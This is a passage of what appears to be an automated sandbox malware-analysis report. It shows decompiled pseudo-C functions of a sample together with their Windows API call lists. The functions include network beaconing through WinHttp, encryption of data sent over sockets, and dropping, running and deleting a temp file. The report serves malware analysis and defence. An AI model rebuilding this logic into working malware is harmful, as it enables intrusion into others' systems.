    										_v48 = _t252 - _t194;
    										while(1) {
    											_t163 = _v20;
    											if(_t163 != 0) {
    												__imp__#6(_t163);
    											}
    											_t164 = _v24;
    											_v20 = 0;
    											if(_t164 != 0) {
    												__imp__#6(_t164);
    											}
    											_t165 = _v28;
    											_push( &_v16);
    											_v24 = 0;
    											_push(_t246);
    											_push(_t165);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x1c))))() < 0) {
    												goto L48;
    											}
    											_t168 = _v16;
    											_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t168 + 0xa4))))(_t168,  &_v24);
    											_t276 = _t170;
    											if(_t170 >= 0) {
    												E003C9090(_t276,  &_v256, 0x48);
    												_t212 =  *0x3e8628; // 0x622508
    												_t261 = _t261 + 8;
    												_push( &_v256);
    												_push(_v24);
    												if( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0xe0))))() != 0) {
    													L40:
    													_t174 = _v16;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
    													_a4 =  &(_a4[1]);
    													_t246 = _t246 + 1;
    													_v16 = 0;
    													if(_t246 < _v8) {
    														continue;
    													} else {
    														goto L41;
    													}
    												} else {
    													_t176 = _v16;
    													_push( &_v20);
    													_push(_t176);
    													if( *((intOrPtr*)( *((intOrPtr*)( *_t176 + 0x68))))() >= 0) {
    														_t255 = E003C7B80(_v20, 0x3e330c,  &_v12, 2);
    														_t263 = _t261 + 0x10;
    														if(_t255 != 2) {
    															__eflags = _t255;
    															while(_t255 > 0) {
    																_t123 = _t255 * 4; // 0x2080
    																_t255 = _t255 - 1;
    																E003CBB40( *((intOrPtr*)(_v12 + _t123 - 4)));
    																_t263 = _t263 + 4;
    																__eflags = _t255;
    															}
    															E003CBB40(_v12);
    															_t261 = _t263 + 4;
    														} else {
    															_t52 = _v12 + 4; // 0x8bfc458b
    															_t183 =  *_t52;
    															_t257 = _v48 + _a4;
    															__imp___wtoi(_t183);
    															 *((intOrPtr*)(_t257 + _v56)) = _t183;
    															 *_t257 = E003C66C0( *_v12);
    															_t264 = _t263 + 8;
    															_t258 = 8;
    															do {
    																_t242 =  *((intOrPtr*)(_t258 + _v12 - 4));
    																_t258 = _t258 - 4;
    																E003CBB40(_t242);
    																_t264 = _t264 + 4;
    															} while (_t258 > 0);
    															E003CBB40(_v12);
    															_t261 = _t264 + 4;
    															_t259 = 0;
    															do {
    																_t189 = rand();
    																asm("cdq");
    																_t243 = _t189 % _v8;
    																_t191 = 0;
    																if(_t246 > 0) {
    																	while( *((intOrPtr*)(_t194 + _t191 * 4)) != _t243) {
    																		_t191 = _t191 + 1;
    																		if(_t191 < _t246) {
    																			continue;
    																		}
    																		goto L23;
    																	}
    																}
    																L23:
    																if(_t191 == _t246) {
    																	 *_a4 = _t243;
    																} else {
    																	goto L24;
    																}
    																L27:
    																if(_t259 == 0x400) {
    																	_t220 = _t243 + 1;
    																	while(_t220 != _t243) {
    																		if(_t220 == _v8) {
    																			_t220 = 0;
    																		}
    																		_t192 = 0;
    																		if(_t246 > 0) {
    																			while( *((intOrPtr*)(_t194 + _t192 * 4)) != _t220) {
    																				_t192 = _t192 + 1;
    																				if(_t192 < _t246) {
    																					continue;
    																				}
    																				goto L36;
    																			}
    																		}
    																		L36:
    																		if(_t192 == _t246) {
    																			 *_a4 = _t220;
    																		} else {
    																			goto L37;
    																		}
    																		goto L40;
    																		L37:
    																		_t220 = _t220 + 1;
    																	}
    																}
    																goto L40;
    																L24:
    																_t259 = _t259 + 1;
    															} while (_t259 < 0x400);
    															goto L27;
    														}
    													}
    												}
    											}
    											goto L48;
    										}
    									}
    									L48:
    									_t246 = 0;
    								}
    								E003CBB40(_v44);
    								_t261 = _t261 + 4;
    							}
    							_t145 = _v32;
    							if(_v32 != _t246) {
    								E003CBB40(_t145);
    								_t261 = _t261 + 4;
    							}
    							if(_t194 != _t246) {
    								E003CBB40(_t194);
    							}
    						}
    					}
    				}
    				_t128 = _v24;
    				if(_t128 != _t246) {
    					__imp__#6(_t128);
    				}
    				_t129 = _v20;
    				if(_t129 != _t246) {
    					__imp__#6(_t129);
    				}
    				_t130 = _v16;
    				if(_t130 != _t246) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 8))))(_t130);
    				}
    				_t131 = _v28;
    				if(_t131 != _t246) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))(_t131);
    				}
    				return _v36;
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003CC049
    • SysFreeString.OLEAUT32(?), ref: 003CC05E
    • _wtoi.MSVCRT ref: 003CC115
    • rand.MSVCRT ref: 003CC160
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • SysFreeString.OLEAUT32(?), ref: 003CC2AE
    • SysFreeString.OLEAUT32(?), ref: 003CC2BC
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 91%
    			E003C44B0(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
    				char _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr* _v20;
    				char _v28;
    				signed int _v32;
    				char _v1056;
    				void* __ebx;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				intOrPtr _t94;
    				intOrPtr _t96;
    				intOrPtr _t104;
    				intOrPtr* _t114;
    				intOrPtr* _t115;
    				intOrPtr _t124;
    				intOrPtr _t132;
    				signed int* _t133;
    				unsigned int _t135;
    				void* _t138;
    				void* _t142;
    				intOrPtr _t148;
    				void* _t150;
    				intOrPtr* _t151;
    				intOrPtr _t152;
    				intOrPtr _t159;
    				signed int _t163;
    				intOrPtr _t166;
    				intOrPtr _t170;
    				signed int _t173;
    				signed short* _t174;
    				signed int _t181;
    				intOrPtr _t182;
    				intOrPtr _t186;
    				signed int _t194;
    				void* _t205;
    				signed int _t206;
    				void* _t208;
    				void* _t210;
    				intOrPtr _t211;
    				intOrPtr _t213;
    				intOrPtr* _t214;
    				intOrPtr* _t215;
    				void* _t216;
    				void* _t217;
    				void* _t220;
    
    				_t210 = __esi;
    				_t205 = __edi;
    				E003C5000( &_v28);
    				_t90 =  *0x3e8628; // 0x622508
    				_v16 = 0;
    				 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0xac))))(0x3e8594, _t150);
    				_t92 =  *0x3e8628; // 0x622508
    				_t181 =  *0x3e857c; // 0x0
    				_v12 = _t181;
    				 *((intOrPtr*)( *((intOrPtr*)(_t92 + 0xc4))))(0x3e8594);
    				_t182 =  *0x3e8584; // 0x0
    				_t151 = _a4;
    				if(_t182 == 0) {
    					_t223 =  *((intOrPtr*)(_t151 + 4)) - _t182;
    					if( *((intOrPtr*)(_t151 + 4)) != _t182) {
    						E003C9090(_t223,  &_v1056, 0xb);
    						_t148 =  *0x3e8628; // 0x622508
    						_t216 = _t216 + 8;
    						_push( &_v1056);
    						_push( *((intOrPtr*)(_t151 + 4)));
    						if( *((intOrPtr*)( *((intOrPtr*)(_t148 + 0xe0))))() == 0) {
    							 *0x3e8584 = 1;
    						}
    					}
    				}
    				_push(_t210);
    				_push(_t205);
    				if( *((intOrPtr*)(_t151 + 0x10)) != 0) {
    					_t135 =  *(_t151 + 0x14);
    					if(_t135 >= 0x100000) {
    						_v8 = (_t135 >> 4) + _t135 + 0x4c;
    						_t215 = E003D1D90((_t135 >> 4) + _t135 + 0x4c, 0);
    						_t138 = E003D1D90(0x10000, 0);
    						_t209 = _t138;
    						_t216 = _t216 + 0x10;
    						if(_t138 != 0 && _t215 != 0) {
    							_push(4);
    							E003C5970(_t138, 0x1040, 2, 4, 4, 4, 4, 4, 4, 4);
    							_v8 = _v8 - 8;
    							_t22 = _t215 + 8; // 0x8
    							_t142 = E003C7600(_t22,  *((intOrPtr*)(_t151 + 0x10)),  *(_t151 + 0x14), _t22,  &_v8, _t209);
    							_t220 = _t216 + 0x3c;
    							if(_t142 == 0) {
    								 *_t215 = 0x4150495a;
    								 *(_t215 + 4) =  *(_t151 + 0x14);
    								 *((intOrPtr*)(_t151 + 0x10)) = _t215;
    								_t215 =  *((intOrPtr*)(_t151 + 0x10));
    								 *(_t151 + 0x14) = _v8 + 8;
    							}
    							E003CBB40(_t215);
    							E003CBB40(_t209);
    							_t216 = _t220 + 8;
    						}
    					}
    				}
    				do {
    					_t94 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xac))))(0x3e8594);
    					if(_v12 < 0) {
    						L23:
    						_v12 = 0xffffffff;
    						L24:
    						_t96 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0xc4))))(0x3e8594);
    						_t50 =  &_v12;
    						 *_t50 = _v12 + 1;
    						if( *_t50 == 0) {
    							_t211 = _v8;
    							goto L47;
    						}
    						_t206 = _v32;
    						_t211 = 0;
    						do {
    							_t114 = E003E1280(0,  &_v1056);
    							_t217 = _t216 + 4;
    							_push(0x1c);
    							if(_t114 == 0) {
    								L003CA47E();
    								_t216 = _t217 + 4;
    								__eflags = _t114;
    								if(_t114 == 0) {
    									L31:
    									_t115 = 0;
    									__eflags = 0;
    									L32:
    									_v20 = _t115;
    									_push(_t206);
    									_push( &_v1056);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))() != 0) {
    										_v8 = _t211;
    										__eflags = _t211 - 5;
    										if(__eflags >= 0) {
    											L42:
    											_t163 = _v16 + 1;
    											_v16 = _t163;
    											if(_t163 > 0x4b0) {
    												goto L48;
    											}
    											if(_t163 != (0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2) + ((0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2)) * 4 + (0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2) + ((0x66666667 * _t163 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t163 >> 0x20 >> 2)) * 4) {
    												_t124 =  *0x3e8628; // 0x622508
    												 *((intOrPtr*)( *((intOrPtr*)(_t124 + 0xc8))))(0x3e8);
    											} else {
    												_t166 =  *0x3e8628; // 0x622508
    												 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0xc8))))(0xea60);
    											}
    											goto L47;
    										}
    										_t213 = 0;
    										__eflags = 0;
    										while(1) {
    											__eflags = E003C90F0(_t151,  *((intOrPtr*)(_t151 + 0x18)), _t206, _t213,  &_v28,  *_t151,  *((intOrPtr*)(_t151 + 4)),  *((intOrPtr*)(_t151 + 8)),  *((intOrPtr*)(_t151 + 0xc)),  *((intOrPtr*)(_t151 + 0x10)),  *(_t151 + 0x14));
    											if(__eflags != 0) {
    												break;
    											}
    											_t170 =  *0x3e8628; // 0x622508
    											 *((intOrPtr*)( *((intOrPtr*)(_t170 + 0xc8))))(0x3e8);
    											_t213 = _t213 + 1;
    											__eflags = _t213 - 3;
    											if(__eflags < 0) {
    												continue;
    											}
    											_v8 = _t213;
    											L41:
    											_t211 = _v8;
    											goto L42;
    										}
    										_v8 = 0;
    										goto L41;
    									}
    									goto L33;
    								}
    								_t115 = E003E1D30(_t114);
    								goto L32;
    							}
    							L003CA47E();
    							_t216 = _t217 + 4;
    							if(_t114 == 0) {
    								goto L31;
    							}
    							_t115 = L003E1DC0(_t114);
    							goto L32;
    							L33:
    							_t211 = _t211 + 1;
    						} while (_t211 < 5);
    						_v8 = _t211;
    						goto L42;
    					}
    					_t152 =  *((intOrPtr*)(_t151 + 0x18));
    					_t132 =  *((intOrPtr*)(_t152 + 8));
    					_t173 = _v12;
    					if(_t173 >=  *((intOrPtr*)(_t132 + 0x18))) {
    						L22:
    						_t151 = _a4;
    						goto L23;
    					}
    					_t174 =  *( *((intOrPtr*)(_t132 + 0x1c)) + _t173 * 4);
    					_t214 = 0x200;
    					_t133 =  &_v1056;
    					_t208 = 0;
    					while(1) {
    						_t39 = _t214 + 0x7ffffdfe; // 0x7ffffffe
    						if(_t39 == 0) {
    							break;
    						}
    						_t194 =  *_t174 & 0x0000ffff;
    						if(_t194 == 0) {
    							break;
    						}
    						 *_t133 = _t194;
    						_t133 =  &(_t133[0]);
    						_t174 =  &(_t174[1]);
    						_t214 = _t214 - 1;
    						if(_t214 != 0) {
    							continue;
    						}
    						L19:
    						_t133 = _t133 - 2;
    						_t208 = 0x8007007a;
    						L20:
    						 *_t133 = 0;
    						if(_t208 < 0) {
    							goto L22;
    						}
    						_t151 = _a4;
    						_v32 =  *( *((intOrPtr*)( *((intOrPtr*)(_t152 + 8)) + 0x20)) + _v12 * 4) & 0x0000ffff;
    						goto L24;
    					}
    					__eflags = _t214;
    					if(__eflags != 0) {
    						goto L20;
    					}
    					goto L19;
    					L47:
    				} while (_t211 > 0);
    				L48:
    				_t98 =  *_t151;
    				if( *_t151 != 0) {
    					E003CBB40(_t98);
    					_t216 = _t216 + 4;
    				}
    				_t99 =  *((intOrPtr*)(_t151 + 4));
    				if( *((intOrPtr*)(_t151 + 4)) != 0) {
    					E003CBB40(_t99);
    					_t216 = _t216 + 4;
    				}
    				_t100 =  *((intOrPtr*)(_t151 + 8));
    				if( *((intOrPtr*)(_t151 + 8)) != 0) {
    					E003CBB40(_t100);
    					_t216 = _t216 + 4;
    				}
    				_t101 =  *((intOrPtr*)(_t151 + 0x10));
    				if( *((intOrPtr*)(_t151 + 0x10)) != 0) {
    					E003CBB40(_t101);
    					_t216 = _t216 + 4;
    				}
    				_t102 =  *((intOrPtr*)(_t151 + 0xc));
    				if( *((intOrPtr*)(_t151 + 0xc)) != 0) {
    					E003CBB40(_t102);
    					_t216 = _t216 + 4;
    				}
    				E003CBB40(_t151);
    				_t104 = _v20;
    				_v28 = 0x3e32ec;
    				if(_t104 != 0) {
    					_push(_t104);
    					L003C1CB0();
    				}
    				_t186 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0xac))))(0x3e8600);
    				_t159 =  *0x3e8628; // 0x622508
    				 *0x3e8618 =  *0x3e8618 - 1;
    				 *((intOrPtr*)( *((intOrPtr*)(_t159 + 0xc4))))(0x3e8600);
    				return 0;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46DE
    • ??3@YAXPAX@Z.MSVCRT ref: 003C4838
      • Part of subcall function 003E1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1D73
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003C7600: memset.MSVCRT ref: 003C7698
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 26%
    			E003D5949(intOrPtr* __eax, void* __eflags, void* _a4, int _a8) {
    				void* _v8;
    				signed int* _v12;
    				char _v32;
    				void _v148;
    				void* __esi;
    				void* _t35;
    				void* _t49;
    				signed int _t50;
    				intOrPtr* _t62;
    				signed int _t64;
    				void* _t74;
    				signed int* _t78;
    
    				_t62 = __eax;
    				_t74 =  *0x3e8538(0x200);
    				_v8 = _t74;
    				_v12 =  *0x3e8538(0x200);
    				_t35 = memset(_t74, 0, 0x200);
    				_t3 =  &_a8; // 0x3d6045
    				 *_t74 = 0x22;
    				__imp__#9( *_t3);
    				 *(_t74 + 9) = _t35;
    				_t7 = _t74 + 0xb; // 0xb
    				memcpy(_t7, _a4, _a8);
    				 *0x3e899c(_t62 + 8, _t74, 0x1fd);
    				_t64 = 0x1d;
    				memcpy( &_v148, _t62 + 8, _t64 << 2);
    				 *0x3e8ab0( &_v148,  &_v32);
    				_t78 = _v12;
    				 *((intOrPtr*)(_v8 + 5)) = _v32;
    				if(E003D3BB7(_t62 + 0xf0, _v8, 0x1fd,  &(_t78[0]), _t62 + 0x110, _t62 + 0x120) == 0) {
    					L6:
    					 *0x3e8540(_v8);
    					 *0x3e8540(_t78);
    					_t49 = 0;
    				} else {
    					_t50 =  *(_t62 + 4) & 0x0000ffff;
    					__imp__#9(_t50);
    					 *_t78 = _t50;
    					_t78[0] = 3;
    					if(E003DFD0B( *_t62, _t78, 0x200) != 0x200 || E003DFB73( *_t62, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003D3BB7(_t62 + 0x100, _v8 + 3, 0x1fd, _t78, _t62 + 0x124, _t62 + 0x134) == 0 ||  *_t78 != 0x28) {
    						goto L6;
    					} else {
    						 *0x3e8540(_v8);
    						 *0x3e8540(_t78);
    						_t49 = 1;
    					}
    				}
    				return _t49;
    			}

    APIs
    • memset.MSVCRT ref: 003D5979
    • htons.WS2_32(E`=), ref: 003D5987
    • memcpy.MSVCRT ref: 003D599B
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D5A0A
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 94%
    			E003E04A0(void* __ecx, intOrPtr* _a4, signed int _a8) {
    				void _v1022;
    				short _v1024;
    				char _v1028;
    				char _v1540;
    				char _v2052;
    				long _t21;
    				intOrPtr* _t22;
    				intOrPtr _t34;
    				intOrPtr* _t41;
    				void* _t48;
    				void* _t54;
    
    				memset( &_v2052, 0, 0x800);
    				_t21 = GetTempPathA(0x104,  &_v2052);
    				_t41 = _a4;
    				_t34 =  *_t41;
    				 *((intOrPtr*)(_t54 + _t21 - 0x800)) = 0x61676571;
    				_t22 =  &_v1540;
    				if(_t34 != 0) {
    					_t48 = _t41 - _t22;
    					do {
    						 *_t22 = _t34;
    						_t34 =  *((intOrPtr*)(_t48 + _t22 + 1));
    						_t22 = _t22 + 1;
    					} while (_t34 != 0);
    				}
    				asm("sbb edx, edx");
    				 *_t22 = ( ~_a8 & 0xffff0000) + 0x5d385b20;
    				_t11 =  &_v2052; // 0x61676571
    				E003E03D0(_t11,  &_v1540, _t22 -  &_v1540 + 4);
    				_v1024 = 0x696e;
    				_v1028 = 0x69676572;
    				_t14 =  &_v2052; // 0x61676571
    				_t16 =  &_v1028; // 0x69676572
    				memcpy( &_v1022, _t14, 0x80 << 2);
    				E003E0420(_t16);
    				_t18 =  &_v2052; // 0x61676571
    				return DeleteFileA(_t18);
    			}

    APIs
    • memset.MSVCRT ref: 003E04BC
    • GetTempPathA.KERNEL32(00000104,?), ref: 003E04D0
      • Part of subcall function 003E03D0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 003E03EA
      • Part of subcall function 003E03D0: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003E0401
      • Part of subcall function 003E03D0: CloseHandle.KERNEL32(00000000), ref: 003E0408
      • Part of subcall function 003E0420: memset.MSVCRT ref: 003E042F
      • Part of subcall function 003E0420: CreateProcessA.KERNEL32(00000000,003E0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003E0468
      • Part of subcall function 003E0420: WaitForSingleObject.KERNEL32(?,00002710), ref: 003E047E
      • Part of subcall function 003E0420: CloseHandle.KERNEL32(?), ref: 003E048E
      • Part of subcall function 003E0420: CloseHandle.KERNEL32(?), ref: 003E0494
    • DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 003E056F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 79%
    			E003C8370(void* __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr* _v28;
    				char _v228;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				intOrPtr* _t90;
    				intOrPtr* _t91;
    				intOrPtr* _t92;
    				intOrPtr* _t93;
    				intOrPtr* _t94;
    				intOrPtr* _t99;
    				intOrPtr* _t101;
    				intOrPtr* _t102;
    				intOrPtr* _t103;
    				intOrPtr* _t104;
    				intOrPtr* _t106;
    				intOrPtr* _t107;
    				intOrPtr _t119;
    				intOrPtr _t123;
    				intOrPtr _t127;
    				intOrPtr _t131;
    				intOrPtr* _t132;
    				intOrPtr* _t133;
    				intOrPtr* _t136;
    				intOrPtr* _t139;
    				intOrPtr* _t140;
    				signed int _t143;
    				intOrPtr _t148;
    				signed int _t149;
    				intOrPtr _t163;
    				intOrPtr _t179;
    				intOrPtr _t192;
    				void* _t206;
    				intOrPtr* _t207;
    				void* _t209;
    				void* _t210;
    				void* _t211;
    
    				_t206 = __ecx;
    				_t87 =  *((intOrPtr*)(__ecx + 4));
    				_v24 = 0;
    				_v8 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				if(_t87 != 0) {
    					 *((intOrPtr*)(__ecx + 0x30)) = 0;
    					 *((intOrPtr*)(__ecx + 0x34)) = 0;
    					 *((intOrPtr*)(__ecx + 0x38)) = 0;
    					 *((intOrPtr*)(__ecx + 0x3c)) = 0;
    					_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0xb4))))(_t87,  &_v24, _t207);
    					__eflags = _t89;
    					if(_t89 < 0) {
    						L30:
    						_t90 = _v20;
    					} else {
    						_t99 = _v24;
    						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x34))))(_t99,  &_v8);
    						__eflags = _t101;
    						if(_t101 < 0) {
    							goto L30;
    						} else {
    							__eflags = _t101 - 1;
    							if(_t101 == 1) {
    								_t90 = _v20;
    								_v28 = 1;
    							} else {
    								while(1) {
    									_t102 = _v12;
    									__eflags = _t102;
    									if(_t102 != 0) {
    										__imp__#6(_t102);
    									}
    									_t103 = _v16;
    									_v12 = 0;
    									__eflags = _t103;
    									if(_t103 != 0) {
    										__imp__#6(_t103);
    									}
    									_t104 = _v8;
    									_v16 = 0;
    									_t106 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0xa4))))(_t104,  &_v12);
    									__eflags = _t106;
    									if(_t106 < 0) {
    										goto L30;
    									}
    									_t107 = _v8;
    									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0x68))))(_t107,  &_v16);
    									if(__eflags < 0) {
    										goto L30;
    									} else {
    										E003C9090(__eflags,  &_v228, 0x75);
    										_t163 =  *0x3e8628; // 0x622508
    										_t210 = _t209 + 8;
    										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0xe0))))(_v12,  &_v228);
    										if(__eflags != 0) {
    											E003C9090(__eflags,  &_v228, 0x77);
    											_t192 =  *0x3e8628; // 0x622508
    											_t211 = _t210 + 8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0xe0))))(_v12,  &_v228);
    											if(__eflags != 0) {
    												E003C9090(__eflags,  &_v228, 0x78);
    												_t119 =  *0x3e8628; // 0x622508
    												_t209 = _t211 + 8;
    												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0xe0))))(_v12,  &_v228);
    												if(__eflags != 0) {
    													E003C9090(__eflags,  &_v228, 0x79);
    													_t123 =  *0x3e8628; // 0x622508
    													_t209 = _t209 + 8;
    													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xe0))))(_v12,  &_v228);
    													if(__eflags != 0) {
    														E003C9090(__eflags,  &_v228, 0x7a);
    														_t127 =  *0x3e8628; // 0x622508
    														_t209 = _t209 + 8;
    														__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xe0))))(_v12,  &_v228);
    														if(__eflags != 0) {
    															E003C9090(__eflags,  &_v228, 0x7b);
    															_t131 =  *0x3e8628; // 0x622508
    															_t209 = _t209 + 8;
    															_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))(_v12,  &_v228);
    															__eflags = _t132;
    															if(_t132 != 0) {
    																goto L26;
    															} else {
    																_t139 = E003C3070(0, _t206, _t206, _t207, _v8);
    																goto L25;
    															}
    														} else {
    															_t139 = E003C2220(_t206, _t206, _t207, _v8);
    															goto L25;
    														}
    													} else {
    														_t139 = E003C53E0(_t206, _t206, _t207, _v8);
    														L25:
    														__eflags = _t139;
    														if(_t139 == 0) {
    															goto L30;
    														} else {
    															goto L26;
    														}
    													}
    												} else {
    													_t140 =  *((intOrPtr*)(_t206 + 0x2c));
    													__eflags = _t140;
    													if(_t140 != 0) {
    														_t140 = E003CBB40(_t140);
    														_t209 = _t209 + 4;
    													}
    													__imp__#2(_v16);
